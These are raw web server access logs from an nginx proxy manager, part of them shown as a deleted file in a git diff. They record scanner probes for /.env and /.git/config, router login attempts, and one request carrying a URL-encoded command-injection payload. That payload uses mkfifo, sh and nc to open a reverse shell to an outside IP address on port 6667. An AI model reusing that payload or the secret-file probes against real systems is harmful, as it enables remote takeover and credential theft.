[Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:26:09 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:32:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:32:52 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:37:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:37:01 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:39:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:22:40:31 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:40:31 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:53:01 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:03:47 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:23:03:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:23:10:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:10:38 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:23:13:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:23:21:17 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:23:24:38 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:26:48 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:54:03 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:55:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:07 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:09:43 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[11/Sep/2025:00:11:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:10 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:11:12 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:13:16 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:15:10 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:19:15 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:25:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:25:36 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:29:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[11/Sep/2025:00:32:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:18 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:19 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:32:19 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:34:39 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" diff --git a/logs/2025-09-11/npm_access_09:39:21.log b/logs/2025-09-11/npm_access_09:39:21.log deleted file mode 100644 index dc755c7..0000000 --- a/logs/2025-09-11/npm_access_09:39:21.log +++ /dev/null @@ -1,209 +0,0 @@ -[10/Sep/2025:07:27:12 +0000] 404 - POST http 172.237.28.60 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" -[10/Sep/2025:07:35:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:35:33 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" -[10/Sep/2025:07:42:46 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:07:51:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:08:23:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:08:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:08:24:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[10/Sep/2025:08:33:14 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:01:08 +0000] 404 - GET http 84167165-jh888-17.tcr195p888.com "/login" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:06:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:09:09:34 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:32:40 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:09:34:50 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:34:51 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:09:39:31 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:09:40:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:09:46:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:46:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:09:57:39 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:09:57:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:10:04:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:08:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:10:33:15 +0000] 403 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 150] [Gzip -] "libwww-perl/6.79" "-" -[10/Sep/2025:10:54:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:10:55:58 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:10:58:41 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:10:58:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:25 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:11:13:45 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:13:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:13:55 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:11:16:25 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:11:18:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" -[10/Sep/2025:11:23:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:11:30:45 +0000] 404 - GET http 172.237.28.60 "/portal/redlion" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:11:56:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:11:56:16 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[10/Sep/2025:12:03:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:07:32 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[10/Sep/2025:12:24:25 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:25:02 +0000] 404 - GET http 172.237.28.60 "/webui/" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" "-" -[10/Sep/2025:12:26:51 +0000] 404 - GET http 172.237.28.60 "/geoserver/web/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36" "-" -[10/Sep/2025:12:28:57 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:12:30:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:12:43:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:00:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:23:16 +0000] 404 - GET http 172.237.28.60 "/actuator/health" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:13:36:48 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:13:40:03 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:13:40:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:40:37 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[10/Sep/2025:13:47:48 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:13:47:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:13:48:52 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:14:10:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:44:57 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:14:54:49 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:14:56:31 +0000] 400 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:14:56:33 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:15:04:03 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:32:33 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:15:46:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:15:46:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:00:23 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:16:00:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:16:06:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:31:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:31:40 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:16:51:18 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:16:59:43 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:16:59:55 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" -[10/Sep/2025:17:22:38 +0000] 200 - GET http 172-237-28-60.ip.linodeusercontent.com "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:17:37:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:05:43 +0000] 400 - GET http 172.237.28.60 "/aaa9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:05:44 +0000] 400 - GET http 172.237.28.60 "/aab9" [Client 10.89.0.8] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" -[10/Sep/2025:18:17:08 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/version" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - GET http 172.237.28.60 "/v1" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:18:23:22 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:23:23 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:18:33:38 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:33:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:18:33:55 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:18:43:30 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:19:10:24 +0000] 400 - GET http 172.237.28.60 